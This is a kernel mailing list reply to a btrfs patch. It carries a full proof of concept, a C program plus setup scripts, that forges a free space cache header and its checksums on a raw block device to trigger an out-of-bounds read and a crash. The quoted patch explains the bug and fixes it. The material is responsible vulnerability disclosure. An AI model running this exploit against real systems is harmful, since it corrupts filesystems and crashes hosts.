Re: [PATCH btrfs v2] btrfs: reject free space cache with more entries than pages

From: Xiang Mei

Date: Wed Jun 10 2026 - 13:52:00 EST


Thanks for your attention to this bug. Below are the PoC and the steps
needed to trigger it.

1) Compile the kernel with the following config
CONFIG:
```
CONFIG_BTRFS_FS=y
CONFIG_BTRFS_ASSERT=n
```

2) Build the image with
```sh
#!/bin/sh
# Create a fresh btrfs image with the free-space-tree feature disabled.
# Usage: <script> [image-path] [size]    (defaults: base.img, 2G)
set -e

image="${1:-base.img}"
size="${2:-2G}"

# Start from an empty sparse file of the requested size.
rm -f "$image"
truncate -s "$size" "$image"

# "^free-space-tree" switches that feature off at mkfs time.
mkfs.btrfs -O ^free-space-tree -f "$image" >/dev/null

echo "wrote clean v1-cache btrfs image: $image ($size)"
```

3) Run QEMU with
```sh
#!/bin/sh
# Boot bzImage under QEMU/KVM with rootfs.img and base.img attached as
# virtio disks and the serial console on stdio.
set -e

# Build the argument vector first, then hand it to QEMU unchanged.
set -- \
	-m 2G -smp 2 -enable-kvm -cpu host \
	-nographic -no-reboot \
	-kernel bzImage \
	-drive file=rootfs.img,if=virtio,format=raw \
	-drive file=base.img,if=virtio,format=raw \
	-append "console=ttyS0 root=/dev/vda rw nokaslr oops=panic panic=-1"

qemu-system-x86_64 "$@"
```

4) Use the following PoC to trigger the bug
```c
// SPDX-License-Identifier: GPL-2.0
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mount.h>
#include <sys/ioctl.h>

/*
 * Block device that is patched and mounted. Can be overridden at build
 * time with -DDEV='"/dev/..."'.
 * NOTE(review): the QEMU command in this message attaches only two virtio
 * drives, which would normally make base.img /dev/vdb -- confirm the
 * device name in the guest before running.
 */
#ifndef DEV
#define DEV "/dev/vdc"
#endif
/* Mount point used for every mount/umount in this program. */
#define MNT "/mnt"
/* Size in bytes of one tree block; the leaf checksum covers NODESIZE - 0x20 bytes. */
#define NODESIZE 16384
/* Step, in bytes, used when scanning the raw image for tree leaves. */
#define SECTOR 4096
/* Offset of the item array from the start of a leaf; item data offsets are relative to it. */
#define HDR 0x65
/* Size in bytes of one item record (8-byte objectid, 1-byte type, 8-byte offset, 4-byte data offset, 4-byte size). */
#define ITEM 25
/* Item size that identifies a free space header item. */
#define FSH_SIZE 41
/* Forged entry count written into each free space header found. */
#define NEW_ENTRIES 0x10000
/* Key objectid (with key type 0) under which free space headers are looked up. */
static const uint64_t FREE_SPACE_OBJECTID = (uint64_t)(-11);

/*
 * Bit-at-a-time CRC-32C (reflected polynomial 0x82F63B78).
 *
 * The register starts as all ones and the result is returned inverted.
 * Returns 0 for an empty input.
 */
static uint32_t crc32c(const uint8_t *p, size_t n)
{
	const uint32_t poly = 0x82F63B78u;
	uint32_t reg = 0xFFFFFFFFu;

	for (size_t left = n; left > 0; left--) {
		reg ^= *p++;
		for (int bit = 8; bit > 0; bit--) {
			if (reg & 1u)
				reg = (reg >> 1) ^ poly;
			else
				reg >>= 1;
		}
	}
	return reg ^ 0xFFFFFFFFu;
}

/*
 * Read a 64-bit little-endian value from p (no alignment required).
 * btrfs stores on-disk integers little-endian, so decode byte by byte
 * instead of relying on the host's byte order.
 */
static uint64_t rd64(const uint8_t *p)
{
	uint64_t v = 0;

	for (int i = 7; i >= 0; i--)
		v = (v << 8) | p[i];
	return v;
}
/*
 * Read a 32-bit little-endian value from p (no alignment required).
 * btrfs stores on-disk integers little-endian, so decode byte by byte
 * instead of relying on the host's byte order.
 */
static uint32_t rd32(const uint8_t *p)
{
	uint32_t v = 0;

	for (int i = 3; i >= 0; i--)
		v = (v << 8) | p[i];
	return v;
}
/*
 * Store v at p as a 64-bit little-endian value (no alignment required).
 * btrfs stores on-disk integers little-endian, so encode byte by byte
 * instead of relying on the host's byte order.
 */
static void wr64(uint8_t *p, uint64_t v)
{
	for (int i = 0; i < 8; i++) {
		p[i] = (uint8_t)(v & 0xFF);
		v >>= 8;
	}
}
/*
 * Store v at p as a 32-bit little-endian value (no alignment required).
 * btrfs stores on-disk integers little-endian, so encode byte by byte
 * instead of relying on the host's byte order.
 */
static void wr32(uint8_t *p, uint32_t v)
{
	for (int i = 0; i < 4; i++) {
		p[i] = (uint8_t)(v & 0xFF);
		v >>= 8;
	}
}

/*
 * Map a logical address to a byte offset inside the raw image.
 *
 * m/sz    : the whole device image and its length in bytes.
 * logical : address to translate.
 *
 * The image is scanned in SECTOR steps. A position counts as a leaf when
 * the byte at +0x64 is zero and the 32-bit count at +0x60 is 1..2000.
 * Inside a leaf, items keyed (objectid 256, type 228) are examined: the
 * key offset is the start of a range, the first 8 data bytes its length,
 * and the 8 bytes at data offset 56 the matching position in the image.
 *
 * Returns the translated offset for the first range containing
 * `logical`, or `logical` unchanged when no range matches.
 */
static uint64_t logical_to_phys(uint8_t *m, off_t sz, uint64_t logical)
{
	for (off_t leaf = 0; leaf + HDR <= sz; leaf += SECTOR) {
		const uint8_t *hdr = m + leaf;
		uint32_t count;
		off_t slot;

		if (hdr[0x64])
			continue;
		count = rd32(hdr + 0x60);
		if (count < 1 || count > 2000)
			continue;

		slot = leaf + HDR;
		for (uint32_t left = count; left > 0; left--, slot += ITEM) {
			const uint8_t *key;
			off_t body;
			uint64_t start;
			uint64_t len;

			/* Item record would run past the image: give up on this leaf. */
			if (slot + ITEM > sz)
				break;

			key = m + slot;
			if (!(rd64(key) == 256 && key[8] == 228))
				continue;

			start = rd64(key + 9);
			body = leaf + HDR + rd32(key + 17);
			if (body + 64 > sz)
				continue;

			len = rd64(m + body);
			if (logical >= start && logical < start + len)
				return rd64(m + body + 48 + 8) + (logical - start);
		}
	}
	return logical;
}

/*
 * Overwrite the data of the cache file owned by inode `ino` with forged
 * entries and matching per-page checksums.
 *
 * m/sz : the whole device image and its length in bytes.
 * ino  : objectid whose type-108 item describes the extent to overwrite.
 *
 * The first matching item with a non-zero disk_bytenr is used. Its extent
 * is treated as num_pages 4096-byte pages. Page 0 starts with one 32-bit
 * checksum per page followed by 8 bytes that are left untouched; the rest
 * of page 0 and all later pages are filled with 17-byte records
 * (8-byte offset, 8-byte length 0x1000, 1-byte type 1).
 *
 * Extents that do not fit inside the image, or whose checksum area would
 * not fit in the first page, are skipped instead of being written out of
 * bounds.
 */
static void forge_cache_page(uint8_t *m, off_t sz, uint64_t ino)
{
	enum { PAGE_BYTES = 4096, ENTRY_BYTES = 17 };

	for (off_t off = 0; off + HDR <= sz; off += SECTOR) {
		if (m[off + 0x64] != 0)
			continue;
		uint32_t nritems = rd32(m + off + 0x60);
		if (nritems == 0 || nritems > 2000)
			continue;
		for (uint32_t i = 0; i < nritems; i++) {
			off_t ip = off + HDR + (off_t)i * ITEM;
			if (ip + ITEM > sz)
				break;
			if (rd64(m + ip) != ino || m[ip + 8] != 108)
				continue;
			off_t dp = off + HDR + rd32(m + ip + 17);
			if (dp + 53 > sz)
				continue;
			uint64_t disk_bytenr = rd64(m + dp + 21);
			if (disk_bytenr == 0)
				continue;

			/* Do the page arithmetic in 64 bits so garbage sizes cannot wrap. */
			uint64_t num_bytes = rd64(m + dp + 45);
			uint64_t page_count = num_bytes / PAGE_BYTES;
			if (page_count < 1)
				page_count = 1;
			/* Checksum array plus the 8 preserved bytes must fit in page 0. */
			if (page_count * 4 + 8 > PAGE_BYTES)
				continue;
			int num_pages = (int)page_count;

			/* Every page written below must lie inside the image. */
			uint64_t base = logical_to_phys(m, sz, disk_bytenr);
			uint64_t span = (uint64_t)num_pages * PAGE_BYTES;
			if (base > (uint64_t)sz || span > (uint64_t)sz - base)
				continue;

			uint8_t *p0 = m + base;
			int crc_area = 4 * num_pages;
			uint64_t voff = 0x4000000ULL;

			for (int pg = 0; pg < num_pages; pg++) {
				uint8_t *p = p0 + (off_t)pg * PAGE_BYTES;
				/* Page 0: skip the checksum array and the next 8 bytes. */
				int e = (pg == 0) ? (crc_area + 8) : 0;

				for (; e + ENTRY_BYTES <= PAGE_BYTES; e += ENTRY_BYTES) {
					wr64(p + e, voff);
					wr64(p + e + 8, 0x1000);
					p[e + 16] = 1;
					voff += 0x100000ULL;
				}
			}

			/* Pages 1..n-1 are checksummed whole. */
			for (int pg = 1; pg < num_pages; pg++)
				wr32(p0 + pg * 4,
				     crc32c(p0 + (off_t)pg * PAGE_BYTES, PAGE_BYTES));
			/* Page 0's checksum excludes the checksum array itself. */
			wr32(p0 + 0, crc32c(p0 + crc_area, PAGE_BYTES - crc_area));
			return;
		}
	}
}

/*
 * Load the whole device into memory, forge every free space header found,
 * and write the image back.
 *
 * For each leaf item keyed (FREE_SPACE_OBJECTID, type 0) whose size is
 * FSH_SIZE, the 64-bit field at data offset 25 is set to NEW_ENTRIES and
 * the cache file named by the first 8 data bytes is rewritten through
 * forge_cache_page(). The checksum of each modified leaf is recomputed.
 *
 * Returns the number of headers patched, or -1 on any I/O or allocation
 * failure. The device is only written after a complete, successful read,
 * and only when at least one header was patched.
 */
static int patch_device(const char *dev)
{
	int result = -1;
	int patched = 0;
	uint8_t *m = NULL;
	off_t sz;
	int fd;

	fd = open(dev, O_RDWR);
	if (fd < 0) {
		perror("open");
		return -1;
	}

	sz = lseek(fd, 0, SEEK_END);
	if (sz < 0 || lseek(fd, 0, SEEK_SET) < 0) {
		perror("lseek");
		goto out;
	}

	m = malloc(sz > 0 ? (size_t)sz : 1);
	if (!m) {
		perror("malloc");
		goto out;
	}

	/* A short read must abort: the buffer is later written back in full. */
	for (off_t got = 0; got < sz; ) {
		ssize_t r = read(fd, m + got, (size_t)(sz - got));

		if (r < 0) {
			perror("read");
			goto out;
		}
		if (r == 0) {
			fputs("read: unexpected end of device\n", stderr);
			goto out;
		}
		got += r;
	}

	/* Only consider positions where a whole tree block fits in the image. */
	for (off_t off = 0; off + NODESIZE <= sz; off += SECTOR) {
		if (m[off + 0x64] != 0)
			continue;
		uint32_t nritems = rd32(m + off + 0x60);
		if (nritems == 0 || nritems > 2000)
			continue;

		int hit = 0;
		for (uint32_t i = 0; i < nritems; i++) {
			off_t ip = off + HDR + (off_t)i * ITEM;
			if (ip + ITEM > sz)
				break;
			uint32_t isize = rd32(m + ip + 21);
			if (rd64(m + ip) != FREE_SPACE_OBJECTID ||
			    m[ip + 8] != 0 || isize != FSH_SIZE)
				continue;
			off_t dptr = off + HDR + rd32(m + ip + 17);
			if (dptr + FSH_SIZE > sz)
				continue;
			uint64_t fino = rd64(m + dptr + 0);
			wr64(m + dptr + 25, NEW_ENTRIES);
			forge_cache_page(m, sz, fino);
			hit = 1;
			patched++;
		}
		/* The leaf checksum sits at offset 0 and covers bytes 0x20..NODESIZE. */
		if (hit)
			wr32(m + off, crc32c(m + off + 0x20, NODESIZE - 0x20));
	}

	if (patched > 0) {
		if (lseek(fd, 0, SEEK_SET) < 0) {
			perror("lseek");
			goto out;
		}
		for (off_t done = 0; done < sz; ) {
			ssize_t w = write(fd, m + done, (size_t)(sz - done));

			if (w <= 0) {
				if (w < 0)
					perror("write");
				else
					fputs("write: no progress\n", stderr);
				goto out;
			}
			done += w;
		}
		if (fsync(fd) < 0) {
			perror("fsync");
			goto out;
		}
	}
	result = patched;

out:
	free(m);
	close(fd);
	return result;
}

/* ioctl request issued on the mount-point directory fd in bake_cache(). */
#define BTRFS_IOC_SYNC _IO(0x94, 8)

/*
 * Mount DEV on MNT as btrfs with the "space_cache=v1" option.
 * Returns whatever mount() returns.
 */
static int mnt_v1(void)
{
	const unsigned long flags = 0;
	const char *options = "space_cache=v1";

	return mount(DEV, MNT, "btrfs", flags, options);
}

/*
 * Create free-space fragmentation under MNT: write 300 files of 1 MiB
 * each (b000..b299), sync, remove every third one, and sync again.
 * Open and write failures are deliberately ignored.
 */
static void churn(void)
{
	static char fill[1 << 20];
	char path[64];
	int idx;

	memset(fill, 'F', sizeof fill);

	for (idx = 0; idx < 300; idx++) {
		int fd;

		snprintf(path, sizeof path, MNT "/b%03d", idx);
		fd = open(path, O_CREAT | O_WRONLY, 0644);
		if (fd < 0)
			continue;
		(void)!write(fd, fill, sizeof fill);
		fsync(fd);
		close(fd);
	}
	sync();

	/* Punch holes: files 0, 3, 6, ..., 297. */
	for (int k = 0; k < 100; k++) {
		snprintf(path, sizeof path, MNT "/b%03d", 3 * k);
		unlink(path);
	}
	sync();
}

/*
 * Generate filesystem activity across three mount/unmount cycles so that
 * a free space cache is written to the device.
 *
 * Cycle 1: churn(), then ten rounds of writing an 8 MiB file, deleting
 *          the previous round's file, and syncing (BTRFS_IOC_SYNC on the
 *          mount directory plus sync()).
 * Cycle 2: write a small file, churn(), sync, unmount.
 * Cycle 3: write a small file, sync, unmount.
 *
 * If the first mount fails, nothing is written and the function returns
 * after reporting the error; otherwise the files would land on whatever
 * filesystem currently backs MNT.
 */
static void bake_cache(void)
{
	static char big[8 << 20];

	memset(big, 'D', sizeof big);

	if (mnt_v1() != 0) {
		perror("[poc] mount(bake)");
		return;
	}

	int dfd = open(MNT, O_RDONLY | O_DIRECTORY);

	churn();
	for (int cyc = 0; cyc < 10; cyc++) {
		char p[64];

		snprintf(p, sizeof p, MNT "/dirty%d", cyc);
		int t = open(p, O_CREAT | O_WRONLY, 0644);
		if (t >= 0) {
			(void)!write(t, big, sizeof big);
			fsync(t);
			close(t);
		}
		if (cyc > 0) {
			char q[64];

			snprintf(q, sizeof q, MNT "/dirty%d", cyc - 1);
			unlink(q);
		}
		if (dfd >= 0)
			ioctl(dfd, BTRFS_IOC_SYNC, 0);
		sync();
	}
	if (dfd >= 0)
		close(dfd);
	umount(MNT);

	if (mnt_v1() == 0) {
		int t = open(MNT "/again", O_CREAT | O_WRONLY, 0644);

		if (t >= 0) {
			(void)!write(t, "y", 1);
			close(t);
		}
		churn();
		sync();
		sleep(1);
		umount(MNT);
	}
	if (mnt_v1() == 0) {
		int t = open(MNT "/again2", O_CREAT | O_WRONLY, 0644);

		if (t >= 0) {
			(void)!write(t, "z", 1);
			close(t);
		}
		sync();
		sleep(1);
		umount(MNT);
	}
}

/*
 * Drive the reproduction: build a cache on DEV, forge it offline, then
 * remount and write files so the forged cache gets loaded.
 *
 * Returns 1 when nothing could be patched or the trigger mount fails,
 * and 0 when the run finishes without the kernel crashing.
 */
int main(void)
{
	/* The mount point may already exist; that is fine. */
	mkdir(MNT, 0755);

	bake_cache();
	puts("[poc] baked v1 cache");

	int patched = patch_device(DEV);

	printf("[poc] patched %d header(s)\n", patched);
	if (patched <= 0) {
		/*
		 * Without a forged header the remount below proves nothing,
		 * so do not fall through to the "no crash" verdict.
		 */
		fputs("[poc] no free space header patched; cannot trigger\n",
		      stderr);
		return 1;
	}

	if (mnt_v1()) {
		perror("[poc] mount(trigger)");
		return 1;
	}
	puts("[poc] remounted; allocating to force block-group caching");
	for (int i = 0; i < 8; i++) {
		char p[64];

		snprintf(p, sizeof p, MNT "/t%d", i);
		int fd = open(p, O_CREAT | O_WRONLY, 0644);
		if (fd >= 0) {
			char b[65536];

			memset(b, 'a' + i, sizeof b);
			for (int j = 0; j < 16; j++)
				if (write(fd, b, sizeof b) < 0)
					break;
			fsync(fd);
			close(fd);
		}
	}
	sync();
	/* Give the kernel time to load the forged cache. */
	sleep(2);
	puts("[poc] no crash (kernel is patched?)");
	return 0;
}
```


Feel free to let us know if you'd like more information about this
bug. We are glad to help.

Best,
Xiang

On Wed, Jun 10, 2026 at 10:29 AM Xiang Mei <xmei5@xxxxxxx> wrote:
>
> When loading a v1 free space cache, __load_free_space_cache() takes
> num_entries and num_bitmaps straight from the on-disk
> btrfs_free_space_header. That header is stored in the tree_root under a key
> with type 0, which the tree-checker has no case for, so neither count is
> validated before the load trusts it.
>
> The load loops num_entries times and maps the next page whenever the current
> one runs out, going through io_ctl_check_crc() -> io_ctl_map_page(), which
> does io_ctl->pages[io_ctl->index++]. But pages[] is allocated in
> io_ctl_init() from the cache inode's i_size, not from num_entries:
>
> num_pages = DIV_ROUND_UP(i_size_read(inode), PAGE_SIZE);
> io_ctl->pages = kcalloc(num_pages, sizeof(struct page *), GFP_NOFS);
>
> So if num_entries claims more records than the pages can hold, io_ctl->index
> runs off the end of pages[]. The write side never hits this because
> io_ctl_add_entry() and io_ctl_add_bitmap() both stop once
> io_ctl->index >= io_ctl->num_pages; the read side just never had the same
> check.
>
> To trigger it, take a clean cache (num_entries = <N> here), set num_entries
> in the header to 0x10000, and fix up the leaf checksum so it still passes
> the tree-checker. The cache inode has i_size = 65536, so num_pages is 16 and
> pages[] is a 16-pointer (kmalloc-128) array. The load now tries to read
> 65536 entries, io_ctl->index walks up to 16, and pages[16] is read past the
> array:
>
> BUG: KASAN: slab-out-of-bounds in io_ctl_check_crc (fs/btrfs/free-space-cache.c:420 fs/btrfs/free-space-cache.c:565)
> Read of size 8 at addr ffff88800c833a80 by task kworker/u8:3/58
> io_ctl_check_crc (fs/btrfs/free-space-cache.c:420 fs/btrfs/free-space-cache.c:565)
> __load_free_space_cache (fs/btrfs/free-space-cache.c:655 fs/btrfs/free-space-cache.c:820)
> load_free_space_cache (fs/btrfs/free-space-cache.c:1017)
> caching_thread (fs/btrfs/block-group.c:880)
> btrfs_work_helper (fs/btrfs/async-thread.c:312)
> process_one_work
> worker_thread
> kthread
> ret_from_fork
>
> free-space-cache.c:420 is io_ctl_map_page(), inlined into io_ctl_check_crc()
> at line 565, which is why that is the frame KASAN names. The out-of-bounds
> slot is then treated as a struct page and handed to crc32c(), so the bad
> read turns into a GP fault.
>
> Add the missing check to io_ctl_check_crc(), which is where both the entry
> loop and the bitmap loop end up. When num_entries is too large the load now
> fails like any corrupt cache: __load_free_space_cache() drops it and rebuilds
> the free space from the extent tree, so a valid cache is never rejected.
>
> Fixes: 5b0e95bf607d ("Btrfs: inline checksums into the disk free space cache")
> Reported-by: Weiming Shi <bestswngs@xxxxxxxxx>
> Assisted-by: Claude:claude-opus-4-8
> Signed-off-by: Xiang Mei <xmei5@xxxxxxx>
> ---
> v2: add more details in the commit message
>
> fs/btrfs/free-space-cache.c | 3 +++
> 1 file changed, 3 insertions(+)
>
> diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
> index ab22e4f9ffdd..bbc4db7fe74b 100644
> --- a/fs/btrfs/free-space-cache.c
> +++ b/fs/btrfs/free-space-cache.c
> @@ -555,6 +555,9 @@ static int io_ctl_check_crc(struct btrfs_io_ctl *io_ctl, int index)
> u32 crc = ~(u32)0;
> unsigned offset = 0;
>
> + if (index >= io_ctl->num_pages)
> + return -EIO;
> +
> if (index == 0)
> offset = sizeof(u32) * io_ctl->num_pages;
>
> --
> 2.43.0
>